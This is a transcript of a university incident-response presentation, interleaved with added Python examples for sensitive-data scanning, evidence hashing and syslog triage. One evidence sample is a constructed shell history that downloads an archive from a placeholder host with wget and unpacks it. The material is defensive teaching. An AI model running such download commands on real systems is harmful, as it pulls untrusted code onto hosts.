Incident Response: How to respond to computer security incidents at UGA (PowerPoint presentation)

Transcript and Presenter's Notes

1
Incident Response: How to respond to computer
security incidents at UGA
  • Jesse Bowling
  • Incident Response Manager
  • EITS - Office of Information Security
  • University of Georgia

2
The Situation
  • Six infosec staff, 50,000 devices
  • Current projects include
  • Endpoint security, Vulnerability management,
    SATE, Risk Assessment, SOC, Incident Response
  • How do we handle it?
  • We work with you as much as possible!

3
What won't we do?
  • Point fingers
  • Administer your box for you
  • Be inflexible or insensitive to your unit
    requirements
  • Drink Habu Sake

4
What will we do?
  • Provide vulnerability scans
  • Furnish IPS and network/device logs of suspicious
    activity
  • Recommend tools
  • Turn off network access if affected system is
    actively attacking others

5
What else will we do?
  • Provide a remediation plan
  • Recommendations for securing your environment
  • Liaise with Legal Affairs and outside entities

6
Findings, Incidents, and Critical Incidents
  • Oh My!

7
Categorizations
  • Finding
  • Incident
  • Critical Incident

8
Finding
  • A finding is a vulnerability or exposure without
    evidence of actual exploitation
  • Nexpose reports fall into this category
  • Sensitive data with more access than required for
    business
  • New vulnerability in software you use

9
Incident
  • A failure, loss, breach, or degradation of a
    service or a system that you support.
  • Virus outbreak on lab machine(s)
  • Warez server on machine with no sensitive info
  • Nachi-infected machine
  • DoS of a non-critical service or machine

10
Critical Incident
  • Major service outage such as main web server,
    email service, etc.
  • Might make the papers
  • Poses financial risk or actual financial loss
  • Affects a large number of stakeholders

11
Critical Incident cont.
  • Identity theft of an individual or group
  • Unauthorized disclosure, modification,
    destruction or deletion of sensitive information
    or data

12
Potential sensitive information
  • https://infosec.uga.edu/sate/sensitive.php
  • Social Security Numbers
  • Driver's license numbers
  • Credit card numbers or bank account numbers with
    associated PIN
  • Legislatively protected data
  • Business related data such as payroll, etc
  • Many more!
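As an added example, not from the UGA slides or the SATE page, here is a small scanner for two of the data types listed above, Social Security Numbers and payment card numbers, of the kind a unit could run over a file share or a suspect host when deciding whether a finding involves sensitive data. The regexes, the masking rule and the sample text are assumptions made for illustration; the Luhn check is the standard card-number checksum, used here to drop random digit runs that merely look like card numbers.

```python
"""Added example (not from the UGA slides): find SSNs and Luhn-valid card numbers
in text and report them masked, so the report is not itself a new exposure.
The regexes and the sample text are assumptions for illustration."""
import re

# Constructed sample text (not real data): one SSN, one Luhn-valid test card
# number, one 16-digit number that fails the Luhn check, and one 9-digit id
# that is not formatted like an SSN.
SAMPLE_TEXT = """\
student record: ssn 123-45-6789, advisor ext 555-0100
payment on file: 4111 1111 1111 1111 (visa)
tracking number 4111111111111112 is not a card
order id 987654321
"""

# SSN in the 3-2-4 form; reject area 000/666/9xx, group 00 and serial 0000.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# 13-19 digits, optionally separated by single spaces or hyphens.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum used by payment card numbers; filters most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask(digits: str) -> str:
    """Keep only the last four digits in any report or ticket."""
    return "*" * (len(digits) - 4) + digits[-4:]


def scan(text: str) -> list:
    """Return (line_number, kind, masked_value) for each hit; line numbers start at 1."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in SSN_RE.finditer(line):
            hits.append((lineno, "ssn", mask(m.group().replace("-", ""))))
        for m in CARD_RE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group())
            if luhn_ok(digits):
                hits.append((lineno, "card", mask(digits)))
    return hits


if __name__ == "__main__":
    for lineno, kind, value in scan(SAMPLE_TEXT):
        print(f"line {lineno}: {kind} {value}")
```

A hit from a scanner like this is still only a finding: it tells you sensitive data exists on the system, not that it was disclosed. It becomes a critical incident (slide 11) when there is evidence the data was accessed or taken.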

14
General Response Steps
  • Identify
  • Contain
  • Eradicate
  • Recover
  • Follow up

15
Identify
  • Please give as much information as possible to
    the EITS Helpdesk
  • IP addresses? Sensitive data? Critical system?
  • Scope, duration, contacts in the department
  • We use several tools to detect incidents,
    including:
  • IPS, Packet Shapers, External reports

16
Contain
  • Unplug from the network if possible
  • Filter ingress and egress on firewall
  • Shut down affected service
  • Beware of making changes
  • Changes can destroy evidence of compromise
  • Especially important if the case may involve law
    enforcement
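An added example, not from the UGA slides, of the "beware changes" point: before any containment step that alters the box (shutting down a service, cleaning up, patching, reimaging), hash the files you will need later and record who collected them and when, so that any subsequent change is detectable. The file names, the sample log content and the collector name are constructed for illustration.

```python
"""Added example (not from the UGA deck): hash evidence before containment so
later changes (cleanup, patching, reimaging) are detectable. Paths and the
sample file contents are constructed for illustration."""
import hashlib
import json
import os
import tempfile
import time


def sha256_file(path: str) -> str:
    """Hash a file in chunks so large logs or memory dumps do not need to fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(paths, collected_by: str) -> dict:
    """Record hash, size and mtime of each evidence file plus who collected it and when."""
    files = {}
    for p in paths:
        st = os.stat(p)
        files[p] = {"sha256": sha256_file(p), "size": st.st_size, "mtime": st.st_mtime}
    return {
        "collected_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "collected_by": collected_by,
        "files": files,
    }


def verify_manifest(manifest: dict) -> list:
    """Return the paths whose current content no longer matches the manifest."""
    changed = []
    for p, rec in manifest["files"].items():
        if not os.path.exists(p) or sha256_file(p) != rec["sha256"]:
            changed.append(p)
    return changed


def demo() -> tuple:
    """Build a manifest over two constructed 'evidence' files, then alter one.
    Returns (changed_before_tamper, changed_after_tamper) as base names."""
    with tempfile.TemporaryDirectory() as d:
        auth = os.path.join(d, "auth.log")
        hist = os.path.join(d, "bash_history")
        with open(auth, "w") as f:   # constructed sample content, not real data
            f.write("Mar  3 02:14:07 lab12 sshd[4411]: Accepted password for root "
                    "from 203.0.113.9 port 51022 ssh2\n")
        with open(hist, "w") as f:
            f.write("wget http://example.invalid/x.tgz\ntar xzf x.tgz\n")

        manifest = build_manifest([auth, hist], collected_by="jdoe")
        manifest_path = os.path.join(d, "manifest.json")
        with open(manifest_path, "w") as f:
            json.dump(manifest, f, indent=2)
        before = verify_manifest(manifest)

        # A well-meaning admin "cleans up" the history before infosec asks for it.
        with open(hist, "w") as f:
            f.write("")
        with open(manifest_path) as f:
            after = verify_manifest(json.load(f))
        return before, [os.path.basename(p) for p in after]


if __name__ == "__main__":
    print(demo())
```

Send the manifest (or at least its own hash) to infosec out of band at collection time; a manifest that lives only on the compromised host can be altered along with the evidence. Where law enforcement may be involved, imaging the disk before any change is still the stronger option, and the manifest then documents what was collected and when.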

17
Eradicate
  • Reimage/reinstall if possible
  • Make sure to patch!
  • Restore from known good backup
  • Patch!
  • Use multiple virus/malware scanners
  • Manual cleanup

18
Recover
  • Ummm... Patch!
  • Implement tougher firewall rules
  • Lock down/disable services
  • Increase your logging
  • Risk assessment
  • Remove risk you don't need

19
Follow Up
  • Let us know what happened
  • We need stats
  • Problem might be campus wide
  • Helps us tune our tools
  • Post-mortem
  • What went wrong? What has been done to correct?
    How can we catch earlier?

20
The Missing Step
  • Is also the most important
  • PREPARE!

21
Preparation
  • Identify critical assets and servers
  • Patch quickly and often
  • Back up, verify, and keep offsite copies
  • Have good procedures and follow them
  • Keep up to date with current threats
  • http://www.sans.org/newsletters/

22
Preparation cont.
  • Invest in firewalls and even an IPS
  • Ensure you're logging (centrally); the SANS Top 5
    Essential Log Reports:
  • 1) Access through Existing Accounts
  • 2) Failed File or Resource Access Attempts
  • 3) Unauthorized Changes to Users, Groups and
    Services
  • 4) Systems Most Vulnerable to Attack
  • 5) Suspicious or Unauthorized Network Traffic
    Patterns
  • You can't protect what you can't see!
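An added example, not from the UGA slides, that turns four of the five log reports above into checks over syslog lines: successful logins from off campus or as root (report 1), repeated failed logins from one source (report 2), user and group changes (report 3), and one source hitting the same port on many hosts (report 5). Report 4, systems most vulnerable to attack, comes from vulnerability scans such as the Nexpose reports mentioned earlier rather than from syslog, so it is not covered here. The campus address range, the thresholds and the sample log lines are assumptions made for illustration.

```python
"""Added example (not from the UGA slides): check syslog lines against the
log-report categories on the slide. Campus range, thresholds and the sample
log are assumptions for illustration."""
import ipaddress
import re
from collections import Counter, defaultdict

# Assumption: 128.192.0.0/16 is the campus range; adjust to your own networks.
CAMPUS = ipaddress.ip_network("128.192.0.0/16")
FAILED_THRESHOLD = 5   # failed logins from one source before it is reported
SCAN_THRESHOLD = 3     # distinct targets on one port before it counts as a sweep

LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
                     r"(?P<proc>[\w-]+)(?:\[\d+\])?: (?P<msg>.*)$")
ACCEPT_RE = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)")
FAIL_RE = re.compile(r"Failed \w+ for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")
DROP_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*DPT=(?P<dpt>\d+)")
ACCOUNT_PROCS = {"useradd", "usermod", "userdel", "groupadd", "groupmod", "gpasswd"}

# Constructed sample syslog (not real UGA data): one normal campus login, then a
# password-guessing run from off campus that succeeds as root, a new account
# added to wheel, and a sweep for TCP/445 from an internal host.
SAMPLE_LOG = """\
Mar  3 01:02:11 lab12 sshd[3001]: Accepted password for jdoe from 128.192.10.5 port 40100 ssh2
Mar  3 02:14:07 lab12 sshd[4411]: Accepted password for root from 203.0.113.9 port 51022 ssh2
Mar  3 02:14:09 lab12 sshd[4412]: Failed password for admin from 203.0.113.9 port 51030 ssh2
Mar  3 02:14:10 lab12 sshd[4413]: Failed password for admin from 203.0.113.9 port 51031 ssh2
Mar  3 02:14:11 lab12 sshd[4414]: Failed password for invalid user oracle from 203.0.113.9 port 51032 ssh2
Mar  3 02:14:12 lab12 sshd[4415]: Failed password for invalid user test from 203.0.113.9 port 51033 ssh2
Mar  3 02:14:13 lab12 sshd[4416]: Failed password for root from 203.0.113.9 port 51034 ssh2
Mar  3 02:15:40 lab12 useradd[4500]: new user: name=svc_backup, UID=1004, GID=1004, home=/home/svc_backup, shell=/bin/bash
Mar  3 02:15:41 lab12 usermod[4501]: add 'svc_backup' to group 'wheel'
Mar  3 02:16:02 lab12 kernel: FW-DROP IN=eth0 OUT= SRC=10.20.30.40 DST=128.192.1.1 PROTO=TCP DPT=445
Mar  3 02:16:02 lab12 kernel: FW-DROP IN=eth0 OUT= SRC=10.20.30.40 DST=128.192.1.2 PROTO=TCP DPT=445
Mar  3 02:16:03 lab12 kernel: FW-DROP IN=eth0 OUT= SRC=10.20.30.40 DST=128.192.1.3 PROTO=TCP DPT=445
Mar  3 02:30:00 lab12 kernel: FW-DROP IN=eth0 OUT= SRC=198.51.100.7 DST=128.192.1.1 PROTO=TCP DPT=22
"""


def off_campus(src: str) -> bool:
    """True unless src parses as an address inside CAMPUS (unparseable counts as off campus)."""
    try:
        return ipaddress.ip_address(src) not in CAMPUS
    except ValueError:
        return True


def triage(log_text: str) -> dict:
    """Bucket syslog lines into the log-report categories from the slide."""
    logins, failed, changes, drops = [], Counter(), [], defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proc, msg = m["proc"], m["msg"]
        if a := ACCEPT_RE.search(msg):
            # 1) access through existing accounts: off-campus or root successes
            if off_campus(a["src"]):
                logins.append((m["ts"], a["user"], a["src"], "off-campus"))
            elif a["user"] == "root":
                logins.append((m["ts"], a["user"], a["src"], "root"))
        elif f := FAIL_RE.search(msg):
            failed[f["src"]] += 1                      # 2) failed access attempts
        elif proc in ACCOUNT_PROCS:
            changes.append((m["ts"], proc, msg))       # 3) user/group changes
        elif d := DROP_RE.search(msg):
            drops[(d["src"], d["dpt"])].add(d["dst"])  # 5) traffic patterns
    return {
        "existing_accounts": logins,
        "failed_access": [(s, n) for s, n in failed.items() if n >= FAILED_THRESHOLD],
        "account_changes": changes,
        "suspicious_traffic": [(s, p, len(t)) for (s, p), t in drops.items()
                               if len(t) >= SCAN_THRESHOLD],
    }


if __name__ == "__main__":
    for report, rows in triage(SAMPLE_LOG).items():
        print(report)
        for row in rows:
            print("  ", row)
```

Run over the sample log, the four reports line up into one story: a guessing run from 203.0.113.9 that ends in a root login, a new account added to wheel a minute later, and the box then sweeping the campus for TCP/445. Each report alone is a finding; together they are an incident, and only central logging lets you see them together after the attacker has cleared the local logs.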

23
Tools
  • SANS lists free tools here
  • https://www.sans.org/resources/vendor_directory/
  • Infosec tool list here
  • https://infosec.uga.edu/sate/tools.php

24
Questions?
  • What tools do you use for auditing, log
    collection, malware removal, network monitoring?
  • What content did you like in this presentation?
    Dislike? What's missing?

25
Thank You!
  • Jesse Bowling
  • Incident Response Manager
  • EITS - Office of Information Security
  • University of Georgia